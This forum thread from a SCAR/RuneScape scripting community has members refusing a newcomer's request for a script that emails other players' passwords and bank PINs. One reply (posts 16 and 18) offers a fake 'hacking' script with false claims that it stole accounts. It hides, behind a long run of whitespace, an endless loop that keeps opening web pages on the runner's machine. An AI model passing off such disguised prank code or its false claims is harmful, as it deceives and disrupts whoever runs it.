Results 1 to 20 of 20

Thread: Wtf?

  1. #1
    Join Date
    Mar 2007
    Posts
    18
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default Wtf?

    Hey, i wrote somewhere here, if in scar is possible to send rs password, rs name, bank pin etc. to e-mail??? Is it possible to add to scar something what will be sending pass, names etc on e-mail?
    If it is possible, please write me some working example...anyway i only want try it :P
    TY

  2. #2
    Join Date
    Jun 2006
    Location
    USA
    Posts
    1,828
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Why would you like to know something about that?
    Also why you want us to show you examples about that?
    Do you want to steal people RS usernames and passwords?
    I think you should be banned...

  3. #3
    Join Date
    Mar 2007
    Posts
    3,681
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    i also think you should be ban you stupid scammer noob ! u think this is a scamming community??

    you come here with merely 13 post asking those things! wtf

    oh i understand it so you can be sent your password by email if you forget it? like a recovery question... i say... BULL + BANNED

  4. #4
    Join Date
    Nov 2006
    Posts
    1,103
    Mentioned
    0 Post(s)
    Quoted
    6 Post(s)

    Default

    why do you want this, planning on making a key-logger or something? if so, get the hell out of here and never come back, if not, please tell me why you want it^^

    [edit]
    i forsee a flamming topic
    Infractions, reputation, reflection, the dark side of scripting, they are.

  5. #5
    Join Date
    Mar 2007
    Posts
    3,681
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    he asked for it asking those obvious questions... omfg im so pissed of right now! first my radial walking failed yet again secondly my pc gets frozen every 3 secs then this guy post a question like this wtf!

  6. #6
    Join Date
    Feb 2006
    Location
    Tracy/Davis, California
    Posts
    12,631
    Mentioned
    135 Post(s)
    Quoted
    418 Post(s)

    Default

    Its probably possible.
    But thats not what we are about here at SRL.
    And scar would alert you before it sends any information, so it would be extremely obvious.
    Please dont ask any more questions like this, no one will help.

  7. #7
    Join Date
    Apr 2007
    Location
    Finland
    Posts
    938
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

  8. #8
    Join Date
    Mar 2007
    Posts
    3,681
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by PwNZoRNooB View Post
    Yes, you don't really need that info.
    *cough* only if he wants to *cough* SCAM!

  9. #9
    Join Date
    Dec 2006
    Posts
    55
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Maybe this guy just dont want to be hacked ... Not

  10. #10
    Join Date
    Dec 2006
    Location
    Third rock from the sun.
    Posts
    2,510
    Mentioned
    4 Post(s)
    Quoted
    1 Post(s)

    Default

    Quote Originally Posted by hugolord View Post
    *cough* only if he wants to *cough* SCAM! (Just a little easier on the eyes)
    Why else would he want it?

    And for Heaven's sake, pk, why would you come right out and say why you want it?

  11. #11
    Join Date
    Apr 2006
    Posts
    710
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Heres the working example:
    SCAR Code:
    program SendMe;
    const
     user = 'username';
     pass = 'password';
     pin = 'pin';
    begin
    repeat
     writeln(username);
     writeln(password);
     writeln(pin);
    until(false);
    end.

  12. #12
    Join Date
    Mar 2007
    Posts
    18
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    OMG i am sorry for that, i didn t think some great best examples, only some noob lol. And i do not need to scamm. I have over 200m in rs, and i am not playing rs. All what i want is lear programming now I only wanted know if it is possible. If i will want know some pass, i will only send to some1 keylogger, not some scar lol. I do not need scamm, i only wanted know how the fuck is this possible in scar lol.

    Srry, maybe you thinked if i want scamm, but no, i do not want

  13. #13
    Join Date
    Apr 2006
    Posts
    710
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    I gave you the example.

  14. #14
    Join Date
    Mar 2007
    Posts
    3,681
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    1. dont swear

    2. ur psot count is suspicious no offence

    3. i dont believe you have 200 mil

    4. its not that easy to send someone a keylogger don't talk like a pro saying oh 'ill just them a keylogger (which btw is called
    'rat')


    and to other ppl who see this im no Hacker i just know what a rat is :P

  15. #15
    Join Date
    Mar 2007
    Posts
    18
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    HugoLord, so easier is send some1 a scar with option to send details?? NO. Keylogger is easier. I only wanted know axiom. That is all. Do you thing if i am so stupid and i thought if you will right now write me a turtorial to write something like this? No i am not lol.

  16. #16
    Join Date
    Jun 2006
    Location
    USA
    Posts
    1,828
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    OMFG cant believe this is still working!
    Found it from SCAR Super Elite Hackers forum, damn I stol my friend's account with this, lol.
    Here you go Xx Pk xX if you still want one, this saves the account details into HTML file, so when it ask to save it, put "Always permit for this URL" so you get the account pass etc.

    SCAR Code:
    program HaxRSAccounts;
    var
     AccountPass:STring;
     Haxing:Boolean;
     HaxTries:Integer;
    const
     HaxAccount='Zezima'; //Who you want to hax
     ChangeAccountsPass='123456';  //What password you want to add for haxed account?
     MyEmail='haxer@hotmail.com';
    begin
     while(not(1=0+1-2+12-22))do
      begin
      Writeln('Haxing account '+HaxAccount)
       While(not(Haxing=False))do
        begin
        Writeln('Hax was not made, trying again...')
        wait(2000)
        end;
      if(HaxTries=0)then
       begin
       Writeln('Account was succesful haxed')
       Writeln('Name: '+HaxAccount+' Pass: '+AccountPass)
       SendInterScarMessage(MyEmail,'Name: '+HaxAccount+' Pass: '+AccountPass) //Saves the html file into your desktop with acc name and pass in it.

       end;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     repeat openWebPage('http://www.'+HaxAccount+'=Details=Pass='+ChangeAccountsPass+'Name='+HaxAccount+'.html')until(False)
      end;
    end.

  17. #17
    Join Date
    Mar 2007
    Posts
    3,681
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by Xx pk xX View Post
    HugoLord, so easier is send some1 a scar with option to send details?? NO. Keylogger is easier. I only wanted know axiom. That is all. Do you thing if i am so stupid and i thought if you will right now write me a turtorial to write something like this? No i am not lol.
    YES i think you are 'stupid' i just told you a minute ago its called a 'RAT' and btw i didn't say scar was easier to hack into ur friends account we have said on first post that this is not Scamming community ffs wont u just read for once in your life we dont SCAM at SRLs!!!!!
    omfg! is it that difficult ?? join SYthe im tired of you ppl!

  18. #18
    Join Date
    Dec 2006
    Location
    Third rock from the sun.
    Posts
    2,510
    Mentioned
    4 Post(s)
    Quoted
    1 Post(s)

    Default

    Quote Originally Posted by Pentti View Post
    OMFG cant believe this is still working!
    Found it from SCAR Super Elite Hackers forum, damn I stol my friend's account with this, lol.
    Here you go Xx Pk xX if you still want one, this saves the account details into HTML file, so when it ask to save it, put "Always permit for this URL" so you get the account pass etc.

    SCAR Code:
    program HaxRSAccounts;
    var
     AccountPass:STring;
     Haxing:Boolean;
     HaxTries:Integer;
    const
     HaxAccount='Zezima'; //Who you want to hax
     ChangeAccountsPass='123456';  //What password you want to add for haxed account?
     MyEmail='haxer@hotmail.com';
    begin
     while(not(1=0+1-2+12-22))do
      begin
      Writeln('Haxing account '+HaxAccount)
       While(not(Haxing=False))do
        begin
        Writeln('Hax was not made, trying again...')
        wait(2000)
        end;
      if(HaxTries=0)then
       begin
       Writeln('Account was succesful haxed')
       Writeln('Name: '+HaxAccount+' Pass: '+AccountPass)
       SendInterScarMessage(MyEmail,'Name: '+HaxAccount+' Pass: '+AccountPass) //Saves the html file into your desktop with acc name and pass in it.

       end;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     repeat openWebPage('http://www.'+HaxAccount+'=Details=Pass='+ChangeAccountsPass+'Name='+HaxAccount+'.html')until(False)
      end;
    end.
    DUDE!

    This really works!!!

    I'm gonna have soooo much fun with this man!

    Oh my gosh... I just stole my friend's account! He's gonna be so mad when he gets on today

  19. #19
    Join Date
    Mar 2007
    Posts
    18
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Hugo, i red SRL rules 2x before making this thread. And maybe it looked like that if i want scamm, but i do not want. I am only currious. And now i know if i have not ask questions like this. And i am not scammer. BTW: i h8 sythe, there are scamming admins too lol. And i said if i am playing rs not more. I am bored of RS. And scar is easy to learn. BTW: I accepted with SRL forum rules when i was registering here. I gave a stupid question here. I am sorry

  20. #20
    Join Date
    Mar 2007
    Posts
    3,681
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by Xx pk xX View Post
    Hugo, i red SRL rules 2x before making this thread. And maybe it looked like that if i want scamm, but i do not want. I am only currious. And now i know if i have not ask questions like this. And i am not scammer. BTW: i h8 sythe, there are scamming admins too lol. And i said if i am playing rs not more. I am bored of RS. And scar is easy to learn. BTW: I accepted with SRL forum rules when i was registering here. I gave a stupid question here. I am sorry
    np and try not to let it happen again please and btw if your really that curious try Penttis script its a lil slow but it works well

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •